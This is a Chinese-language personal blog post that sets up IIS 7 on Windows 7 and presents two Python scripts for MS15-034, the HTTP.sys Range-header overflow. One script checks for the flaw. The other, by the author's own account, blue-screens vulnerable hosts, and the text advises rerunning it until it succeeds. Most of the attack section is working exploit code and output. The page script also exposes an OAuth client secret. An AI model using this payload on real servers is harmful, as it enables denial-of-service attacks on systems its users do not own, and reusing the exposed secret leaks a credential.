<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
  <title>检测ms15-034的微软的iis漏洞 - Kmp - beyondkmp&#39;s new hugo blog</title>
  <meta name="renderer" content="webkit" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>

<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />

<meta name="theme-color" content="#f8f5ec" />
<meta name="msapplication-navbutton-color" content="#f8f5ec">
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="#f8f5ec">


<meta name="author" content="beyondkmp" /><meta name="description" content="本文主要教大家怎么检测iis7的ms15-034漏洞" /><meta name="keywords" content="ms15-034, iis漏洞, 微软" />






<meta name="generator" content="Hugo 0.58.3 with theme even" />


<link rel="canonical" href="https://beyondkmp.com/post/%E6%A3%80%E6%B5%8Bms15-034%E7%9A%84%E5%BE%AE%E8%BD%AF%E7%9A%84iis%E6%BC%8F%E6%B4%9E/" />
<link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon.png">
<link rel="icon" type="image/png" sizes="32x32" href="/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="16x16" href="/favicon-16x16.png">
<link rel="manifest" href="/manifest.json">
<link rel="mask-icon" href="/safari-pinned-tab.svg" color="#5bbad5">

<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
<link href="/dist/even.6956de95.min.css" rel="stylesheet">



<meta property="og:title" content="检测ms15-034的微软的iis漏洞" />
<meta property="og:description" content="本文主要教大家怎么检测iis7的ms15-034漏洞" />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://beyondkmp.com/post/%E6%A3%80%E6%B5%8Bms15-034%E7%9A%84%E5%BE%AE%E8%BD%AF%E7%9A%84iis%E6%BC%8F%E6%B4%9E/" />
<meta property="article:published_time" content="2015-04-19T00:00:00+08:00" />
<meta property="article:modified_time" content="2015-04-19T00:00:00+08:00" />
<meta itemprop="name" content="检测ms15-034的微软的iis漏洞">
<meta itemprop="description" content="本文主要教大家怎么检测iis7的ms15-034漏洞">


<meta itemprop="datePublished" content="2015-04-19T00:00:00&#43;08:00" />
<meta itemprop="dateModified" content="2015-04-19T00:00:00&#43;08:00" />
<meta itemprop="wordCount" content="867">



<meta itemprop="keywords" content="ms15-034,iis漏洞,微软," />
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="检测ms15-034的微软的iis漏洞"/>
<meta name="twitter:description" content="本文主要教大家怎么检测iis7的ms15-034漏洞"/>

<!--[if lte IE 9]>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/classlist/1.1.20170427/classList.min.js"></script>
<![endif]-->

<!--[if lt IE 9]>
  <script src="https://cdn.jsdelivr.net/npm/html5shiv@3.7.3/dist/html5shiv.min.js"></script>
  <script src="https://cdn.jsdelivr.net/npm/respond.js@1.4.2/dest/respond.min.js"></script>
<![endif]-->

</head>
<body>
  <div id="mobile-navbar" class="mobile-navbar">
  <div class="mobile-header-logo">
    <a href="/" class="logo">Kmp</a>
  </div>
  <div class="mobile-navbar-icon">
    <span></span>
    <span></span>
    <span></span>
  </div>
</div>
<nav id="mobile-menu" class="mobile-menu slideout-menu">
  <ul class="mobile-menu-list">
    <a href="/">
        <li class="mobile-menu-item">Home</li>
      </a><a href="/post/">
        <li class="mobile-menu-item">Archives</li>
      </a><a href="/tags/">
        <li class="mobile-menu-item">Tags</li>
      </a><a href="/categories/">
        <li class="mobile-menu-item">Categories</li>
      </a><a href="/about/">
        <li class="mobile-menu-item">About</li>
      </a>
  </ul>
</nav>
  <div class="container" id="mobile-panel">
    <header id="header" class="header">
        <div class="logo-wrapper">
  <a href="/" class="logo">Kmp</a>
</div>

<nav class="site-navbar">
  <ul id="menu" class="menu">
    <li class="menu-item">
        <a class="menu-item-link" href="/">Home</a>
      </li><li class="menu-item">
        <a class="menu-item-link" href="/post/">Archives</a>
      </li><li class="menu-item">
        <a class="menu-item-link" href="/tags/">Tags</a>
      </li><li class="menu-item">
        <a class="menu-item-link" href="/categories/">Categories</a>
      </li><li class="menu-item">
        <a class="menu-item-link" href="/about/">About</a>
      </li>
  </ul>
</nav>
    </header>

    <main id="main" class="main">
      <div class="content-wrapper">
        <div id="content" class="content">
          <article class="post">
    
    <header class="post-header">
      <h1 class="post-title">检测ms15-034的微软的iis漏洞</h1>

      <div class="post-meta">
        <span class="post-time"> 2015-04-19 </span>
        <div class="post-category">
            <a href="/categories/%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E4%B8%8E%E6%94%B6%E9%9B%86/"> 漏洞分析与收集 </a>
            </div>
        <span id="busuanzi_container_page_pv" class="more-meta"> <span id="busuanzi_value_page_pv"><img src="/img/spinner.svg" alt="spinner.svg"/></span> times read </span>
      </div>
    </header>

    <div class="post-toc" id="post-toc">
  <h2 class="post-toc-title">Contents</h2>
  <div class="post-toc-content">
    <nav id="TableOfContents">
<ul>
<li>
<ul>
<li><a href="#win-7-打开iis-7服务">win 7 打开iis 7服务</a></li>
<li><a href="#攻击代码">攻击代码</a>
<ul>
<li><a href="#参考">参考</a></li>
</ul></li>
</ul></li>
</ul>
</nav>
  </div>
</div>
  <div class="post-outdated">
    <div class="warn">
      <p>[NOTE] Updated <span class="timeago" datetime="2015-04-19T00:00:00" title="April 19, 2015">April 19, 2015</span>. This article may have outdated content or subject matter.</p>
    </div>
  </div>
    <div class="post-content">
      

<h2 id="win-7-打开iis-7服务">win 7 打开iis 7服务</h2>

<p>进入win 7的控制面板，选择打开或关闭Windows功能,如下图:</p>

<p><img src="/imgs/iis7漏洞/1.jpg" alt="1" /></p>

<p>出现windows功能选项，选择下面的选项就会开启iis7服务:</p>

<p><img src="/imgs/iis7漏洞/2.jpg" alt="2" /></p>

<p>开启成功后，直接在开始里面输入iis,打开internet信息服务(IIS)管理器,如下图可以看到default网站已经启动，直接访问网址就可以得到iis7经典界面了！</p>

<p><img src="/imgs/iis7漏洞/3.jpg" alt="3" />
<img src="/imgs/iis7漏洞/4.png" alt="4" /></p>

<h2 id="攻击代码">攻击代码</h2>

<p>用下面代码检测是否存在漏洞</p>

<pre><code>⇒  python vul.py 172.16.69.67
[*] Audit Started
[!!] Looks VULN
</code></pre>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre class="chroma"><code class="language-python" data-lang="python"><span class="lnt"> 1
</span><span class="lnt"> 2
</span><span class="lnt"> 3
</span><span class="lnt"> 4
</span><span class="lnt"> 5
</span><span class="lnt"> 6
</span><span class="lnt"> 7
</span><span class="lnt"> 8
</span><span class="lnt"> 9
</span><span class="lnt">10
</span><span class="lnt">11
</span><span class="lnt">12
</span><span class="lnt">13
</span><span class="lnt">14
</span><span class="lnt">15
</span><span class="lnt">16
</span><span class="lnt">17
</span><span class="lnt">18
</span><span class="lnt">19
</span><span class="lnt">20
</span><span class="lnt">21
</span><span class="lnt">22
</span><span class="lnt">23
</span><span class="lnt">24
</span><span class="lnt">25
</span><span class="lnt">26
</span><span class="lnt">27
</span><span class="lnt">28
</span><span class="lnt">29
</span><span class="lnt">30
</span><span class="lnt">31
</span><span class="lnt">32
</span><span class="lnt">33
</span><span class="lnt">34
</span><span class="lnt">35
</span><span class="lnt">36
</span><span class="lnt">37
</span><span class="lnt">38
</span><span class="lnt">39
</span><span class="lnt">40
</span><span class="lnt">41
</span><span class="lnt">42
</span><span class="lnt">43
</span><span class="lnt">44
</span><span class="lnt">45
</span><span class="lnt">46
</span><span class="lnt">47
</span><span class="lnt">48
</span><span class="lnt">49
</span><span class="lnt">50
</span><span class="lnt">51
</span><span class="lnt">52
</span><span class="lnt">53
</span><span class="lnt">54
</span></code></pre></td>
<td class="lntd">
<pre class="chroma"><code class="language-python" data-lang="python"><span class="s1">&#39;&#39;&#39;
</span><span class="s1">___.                                   .___ __                         __  
</span><span class="s1">\_ |__   ____ ___.__. ____   ____    __| _//  |________ __ __  _______/  |_
</span><span class="s1">| __ \_/ __ &lt;   |  |/  _ \ /    \ / __ |\  __\_  __ \ |  \/  ___/\  __</span><span class="se">\
</span><span class="se"></span><span class="s1">| \_\ \ ___/\___  (  &lt;_&gt; )   |  \/ /_/ | |  |  |  | \/  |  /\___ \ |  |  
</span><span class="s1">|___  /\___  &gt; ____|\____/|___|  /\____ | |__|  |__|  |____//____  &gt; |__|  
</span><span class="s1">    \/     \/\/                \/      \/                        \/        
</span><span class="s1">                                                           MS15-034 Checker
</span><span class="s1"> 
</span><span class="s1">Danger! This script has not been properly qa&#39;d and will probably fail in terrible ways.
</span><span class="s1">It is based off a change in HTTP!UlpParseRange in which an error code is returned as a
</span><span class="s1">result of a call to HTTP!RtlULongLongAdd when evaluating the upper and lower range of
</span><span class="s1">an HTTP range request.
</span><span class="s1">-BF
</span><span class="s1"> 
</span><span class="s1"> 
</span><span class="s1">8a8b2112 56              push    esi
</span><span class="s1">8a8b2113 6a00            push    0
</span><span class="s1">8a8b2115 2bc7            sub     eax,edi
</span><span class="s1">8a8b2117 6a01            push    1
</span><span class="s1">8a8b2119 1bca            sbb     ecx,edx
</span><span class="s1">8a8b211b 51              push    ecx
</span><span class="s1">8a8b211c 50              push    eax
</span><span class="s1">8a8b211d e8bf69fbff      call    HTTP!RtlULongLongAdd (8a868ae1) ; here
</span><span class="s1"> 
</span><span class="s1">&#39;&#39;&#39;</span>
<span class="kn">import</span> <span class="nn">socket</span>
<span class="kn">import</span> <span class="nn">random</span>
<span class="kn">import</span> <span class="nn">sys</span>
 
<span class="n">ipAddr</span><span class="o">=</span><span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span>
<span class="n">hexAllFfff</span> <span class="o">=</span> <span class="s2">&#34;18446744073709551615&#34;</span>
 
<span class="n">req1</span> <span class="o">=</span> <span class="s2">&#34;GET / HTTP/1.0</span><span class="se">\r\n\r\n</span><span class="s2">&#34;</span>
<span class="n">req</span> <span class="o">=</span> <span class="s2">&#34;GET / HTTP/1.1</span><span class="se">\r\n</span><span class="s2">Host: stuff</span><span class="se">\r\n</span><span class="s2">Range: bytes=0-&#34;</span> <span class="o">+</span> <span class="n">hexAllFfff</span> <span class="o">+</span> <span class="s2">&#34;</span><span class="se">\r\n\r\n</span><span class="s2">&#34;</span>
 
<span class="k">print</span> <span class="s2">&#34;[*] Audit Started&#34;</span>
<span class="n">client_socket</span> <span class="o">=</span> <span class="n">socket</span><span class="o">.</span><span class="n">socket</span><span class="p">(</span><span class="n">socket</span><span class="o">.</span><span class="n">AF_INET</span><span class="p">,</span> <span class="n">socket</span><span class="o">.</span><span class="n">SOCK_STREAM</span><span class="p">)</span>
<span class="n">client_socket</span><span class="o">.</span><span class="n">connect</span><span class="p">((</span><span class="n">ipAddr</span><span class="p">,</span> <span class="mi">80</span><span class="p">))</span>
<span class="n">client_socket</span><span class="o">.</span><span class="n">send</span><span class="p">(</span><span class="n">req1</span><span class="p">)</span>
<span class="n">boringResp</span> <span class="o">=</span> <span class="n">client_socket</span><span class="o">.</span><span class="n">recv</span><span class="p">(</span><span class="mi">1024</span><span class="p">)</span>
<span class="k">if</span> <span class="s2">&#34;Microsoft&#34;</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">boringResp</span><span class="p">:</span>
    <span class="k">print</span> <span class="s2">&#34;[*] Not IIS&#34;</span>
<span class="n">client_socket</span><span class="o">.</span><span class="n">close</span><span class="p">()</span>
<span class="n">client_socket</span> <span class="o">=</span> <span class="n">socket</span><span class="o">.</span><span class="n">socket</span><span class="p">(</span><span class="n">socket</span><span class="o">.</span><span class="n">AF_INET</span><span class="p">,</span> <span class="n">socket</span><span class="o">.</span><span class="n">SOCK_STREAM</span><span class="p">)</span>
<span class="n">client_socket</span><span class="o">.</span><span class="n">connect</span><span class="p">((</span><span class="n">ipAddr</span><span class="p">,</span> <span class="mi">80</span><span class="p">))</span>
<span class="n">client_socket</span><span class="o">.</span><span class="n">send</span><span class="p">(</span><span class="n">req</span><span class="p">)</span>
<span class="n">goodResp</span> <span class="o">=</span> <span class="n">client_socket</span><span class="o">.</span><span class="n">recv</span><span class="p">(</span><span class="mi">1024</span><span class="p">)</span>
<span class="k">if</span> <span class="s2">&#34;Requested Range Not Satisfiable&#34;</span> <span class="ow">in</span> <span class="n">goodResp</span><span class="p">:</span>
    <span class="k">print</span> <span class="s2">&#34;[!!] Looks VULN&#34;</span>
<span class="k">elif</span> <span class="s2">&#34; The request has an invalid header name&#34;</span> <span class="ow">in</span> <span class="n">goodResp</span><span class="p">:</span>
    <span class="k">print</span> <span class="s2">&#34;[*] Looks Patched&#34;</span>
<span class="k">else</span><span class="p">:</span>
    <span class="k">print</span> <span class="s2">&#34;[*] Unexpected response, cannot discern patch status&#34;</span></code></pre></td></tr></table>
</div>
</div>
<p>用下面的代码可以将存在漏洞的机子蓝屏，不过有时会出现<code>socket.error: [Errno 54] Connection reset by peer</code>错误,没事多运行几次就成功了。</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre class="chroma"><code class="language-python" data-lang="python"><span class="lnt"> 1
</span><span class="lnt"> 2
</span><span class="lnt"> 3
</span><span class="lnt"> 4
</span><span class="lnt"> 5
</span><span class="lnt"> 6
</span><span class="lnt"> 7
</span><span class="lnt"> 8
</span><span class="lnt"> 9
</span><span class="lnt">10
</span><span class="lnt">11
</span><span class="lnt">12
</span><span class="lnt">13
</span><span class="lnt">14
</span><span class="lnt">15
</span><span class="lnt">16
</span><span class="lnt">17
</span><span class="lnt">18
</span><span class="lnt">19
</span><span class="lnt">20
</span><span class="lnt">21
</span><span class="lnt">22
</span><span class="lnt">23
</span><span class="lnt">24
</span><span class="lnt">25
</span><span class="lnt">26
</span><span class="lnt">27
</span><span class="lnt">28
</span><span class="lnt">29
</span><span class="lnt">30
</span><span class="lnt">31
</span></code></pre></td>
<td class="lntd">
<pre class="chroma"><code class="language-python" data-lang="python"><span class="kn">import</span> <span class="nn">socket</span>
<span class="kn">import</span> <span class="nn">random</span>
<span class="kn">import</span> <span class="nn">sys</span>
 
<span class="n">ipAddr</span> <span class="o">=</span> <span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span>
<span class="n">port</span> <span class="o">=</span> <span class="mi">80</span>
<span class="n">hexAllFfff</span>  <span class="o">=</span> <span class="s2">&#34;18446744073709551615&#34;</span>
 
<span class="k">print</span> <span class="s2">&#34;[*] Audit Started&#34;</span>
<span class="n">req1</span> <span class="o">=</span> <span class="s2">&#34;GET / HTTP/1.0</span><span class="se">\r\n\r\n</span><span class="s2">&#34;</span>
<span class="n">client_socket</span> <span class="o">=</span> <span class="n">socket</span><span class="o">.</span><span class="n">socket</span><span class="p">(</span><span class="n">socket</span><span class="o">.</span><span class="n">AF_INET</span><span class="p">,</span> <span class="n">socket</span><span class="o">.</span><span class="n">SOCK_STREAM</span><span class="p">)</span>
<span class="n">client_socket</span><span class="o">.</span><span class="n">connect</span><span class="p">((</span><span class="n">ipAddr</span><span class="p">,</span> <span class="mi">80</span><span class="p">))</span>
<span class="n">client_socket</span><span class="o">.</span><span class="n">send</span><span class="p">(</span><span class="n">req1</span><span class="p">)</span>
<span class="n">boringResp</span> <span class="o">=</span> <span class="n">client_socket</span><span class="o">.</span><span class="n">recv</span><span class="p">(</span><span class="mi">1024</span><span class="p">)</span>
<span class="k">if</span> <span class="s2">&#34;Microsoft&#34;</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">boringResp</span><span class="p">:</span>
    <span class="k">print</span> <span class="s2">&#34;[*] Not IIS&#34;</span>
    <span class="nb">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span>
<span class="n">client_socket</span><span class="o">.</span><span class="n">close</span><span class="p">()</span>
 
<span class="n">req</span> <span class="o">=</span> <span class="s2">&#34;GET /welcome.png HTTP/1.1</span><span class="se">\r\n</span><span class="s2">Host: stuff</span><span class="se">\r\n</span><span class="s2">Range: bytes=2-&#34;</span> <span class="o">+</span> <span class="n">hexAllFfff</span> <span class="o">+</span> <span class="s2">&#34;</span><span class="se">\r\n\r\n</span><span class="s2">&#34;</span>
 
<span class="n">client_socket</span> <span class="o">=</span> <span class="n">socket</span><span class="o">.</span><span class="n">socket</span><span class="p">(</span><span class="n">socket</span><span class="o">.</span><span class="n">AF_INET</span><span class="p">,</span> <span class="n">socket</span><span class="o">.</span><span class="n">SOCK_STREAM</span><span class="p">)</span>
<span class="n">client_socket</span><span class="o">.</span><span class="n">connect</span><span class="p">((</span><span class="n">ipAddr</span><span class="p">,</span> <span class="mi">80</span><span class="p">))</span>
<span class="n">client_socket</span><span class="o">.</span><span class="n">send</span><span class="p">(</span><span class="n">req</span><span class="p">)</span>
<span class="n">goodResp</span> <span class="o">=</span> <span class="n">client_socket</span><span class="o">.</span><span class="n">recv</span><span class="p">(</span><span class="mi">1024</span><span class="p">)</span>
<span class="k">if</span> <span class="s2">&#34;Requested Range Not Satisfiable&#34;</span> <span class="ow">in</span> <span class="n">goodResp</span><span class="p">:</span>
    <span class="k">print</span> <span class="s2">&#34;[!!] Looks VULN&#34;</span>
<span class="k">elif</span> <span class="s2">&#34; The request has an invalid header name&#34;</span> <span class="ow">in</span> <span class="n">goodResp</span><span class="p">:</span>
    <span class="k">print</span> <span class="s2">&#34;[*] Looks Patched&#34;</span>
<span class="k">else</span><span class="p">:</span>
    <span class="k">print</span> <span class="s2">&#34;[*] Unexpected response, cannot discern patch status&#34;</span></code></pre></td></tr></table>
</div>
</div>
<p>运行上面的代码</p>

<pre><code>python vul.py 172.16.69.67
</code></pre>

<p>成功后的留念,这两段代码的主要区别在于<strong>bytes后面的数字</strong>:</p>

<p><img src="/imgs/iis7漏洞/5.jpg" alt="5" /></p>

<p>今天还学会了新招了,要找漏洞相关的信息可以到twitter上直接搜索ms15-034就可以搜到很多大牛写的分析文档了。</p>

<h3 id="参考">参考</h3>

<ol>
<li><a href="http://security.alibaba.com/blog/blog.htm?spm=0.0.0.0.lOZTaW&amp;id=16">IIS服务器漏洞（MS15-034）威胁分析</a></li>
<li><a href="http://blog.knownsec.com/2015/04/iis_cve-2015-1635/">IIS 系列 Http.sys 处理 Range 整数溢出漏洞 应急分析报告</a></li>
<li><a href="http://blogs.360.cn/blog/cve_2015_6135_http_rce_analysis/">MS15-034/CVE-2015-1635 HTTP远程代码执行漏洞分析</a></li>
<li><a href="http://blog.beyondtrust.com/the-delicate-art-of-remote-checks-a-glance-into-ms15-034">The Delicate Art of Remote Checks – A Glance Into MS15-034</a></li>
<li><a href="http://www.securitysift.com/an-analysis-of-ms15-034/">An Analysis Of MS15-034</a></li>
</ol>

    </div>

    <div class="post-copyright">
  <p class="copyright-item">
    <span class="item-title">Author</span>
    <span class="item-content">beyondkmp</span>
  </p>
  <p class="copyright-item">
    <span class="item-title">LastMod</span>
    <span class="item-content">
        2015-04-19
        
    </span>
  </p>
  
  
</div>
<div class="post-reward">
  <input type="checkbox" name="reward" id="reward" hidden />
  <label class="reward-button" for="reward">Reward</label>
  <div class="qr-code">
    
    <label class="qr-code-image" for="reward">
        <img class="image" src="/alipay-qr-code.png">
        <span>wechat</span>
      </label>
    <label class="qr-code-image" for="reward">
        <img class="image" src="/wechat-qr-code.png">
        <span>alipay</span>
      </label>
  </div>
</div><footer class="post-footer">
      <div class="post-tags">
          <a href="/tags/ms15-034/">ms15-034</a>
          <a href="/tags/iis%E6%BC%8F%E6%B4%9E/">iis漏洞</a>
          <a href="/tags/%E5%BE%AE%E8%BD%AF/">微软</a>
          </div>
      <nav class="post-nav">
        <a class="prev" href="/post/net-creds%E5%97%85%E6%8E%A2%E6%95%8F%E6%84%9F%E6%95%B0%E6%8D%AE/">
            <i class="iconfont icon-left"></i>
            <span class="prev-text nav-default">net-creds嗅探敏感数据</span>
            <span class="prev-text nav-mobile">Prev</span>
          </a>
        <a class="next" href="/post/excel%E5%AE%9E%E7%8E%B0%E4%B8%8B%E6%8B%89%E5%88%97%E8%A1%A8%E5%B9%B6%E4%BF%9D%E6%8C%81%E9%94%AE%E5%80%BC%E5%AF%B9/">
            <span class="next-text nav-default">Excel实现下拉列表并管理键值对</span>
            <span class="next-text nav-mobile">Next</span>
            <i class="iconfont icon-right"></i>
          </a>
      </nav>
    </footer>
  </article>
        </div>
        <div id="gitalk-container"></div>
    <link rel="stylesheet" href="https://unpkg.com/gitalk/dist/gitalk.css" crossorigin="anonymous">
    <script src="https://unpkg.com/gitalk/dist/gitalk.min.js" crossorigin="anonymous"></script>
    <script type="text/javascript">
      var gitalk = new Gitalk({
        id: '2015-04-19 00:00:00 \x2b0800 \x2b0800',
        title: '检测ms15-034的微软的iis漏洞',
        clientID: '8c413eab333f8cafbd18',
        clientSecret: '050bd9a4697c830cddf6038327c616dea25d0a7f',
        repo: 'c',
        owner: 'kmpccc',
        admin: ['kmpccc'],
        body: decodeURI(location.href)
      });
      gitalk.render('gitalk-container');
    </script>
    <noscript>Please enable JavaScript to view the <a href="https://github.com/gitalk/gitalk">comments powered by gitalk.</a></noscript>

  

  

      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="social-links">
      <a href="mailto:beyondkmp@gmail.com" class="iconfont icon-email" title="email"></a>
      <a href="https://stackoverflow.com/users/4652054/beyondkmp" class="iconfont icon-stack-overflow" title="stack-overflow"></a>
      <a href="https://twitter.com/beyondkmp" class="iconfont icon-twitter" title="twitter"></a>
      <a href="https://github.com/beyondkmp" class="iconfont icon-github" title="github"></a>
  <a href="https://beyondkmp.com/index.xml" type="application/rss+xml" class="iconfont icon-rss" title="rss"></a>
</div>

<div class="copyright">
  <span class="power-by">
    Powered by <a class="hexo-link" href="https://gohugo.io">Hugo</a>
  </span>
  <span class="division">|</span>
  <span class="theme-info">
    Theme - 
    <a class="theme-link" href="https://github.com/olOwOlo/hugo-theme-even">Even</a>
  </span>

  <div class="busuanzi-footer">
    <span id="busuanzi_container_site_pv"> site pv: <span id="busuanzi_value_site_pv"><img src="/img/spinner.svg" alt="spinner.svg"/></span> </span>
      <span class="division">|</span>
    <span id="busuanzi_container_site_uv"> site uv: <span id="busuanzi_value_site_uv"><img src="/img/spinner.svg" alt="spinner.svg"/></span> </span>
  </div>

  <span class="copyright-year">
    &copy; 
    2015 - 
    2019
    <span class="heart">
      <i class="iconfont icon-heart"></i>
    </span>
    <span class="author">beyondkmp</span>
  </span>
</div>
    </footer>

    <div class="back-to-top" id="back-to-top">
      <i class="iconfont icon-up"></i>
    </div>
  </div>
  
  
  
  
    
    
  <script><!-- NOTE: timeago.js uses the language code format like "zh_CN" (underscore and case sensitive) -->
    var languageCode = "en".replace(/-/g, '_').replace(/_(.*)/, function ($0, $1) {return $0.replace($1, $1.toUpperCase());});
    timeago().render(document.querySelectorAll('.timeago'), languageCode);
    timeago.cancel();  
  </script>
<script type="text/javascript" src="/dist/even.26188efa.min.js"></script>








</body>
</html>
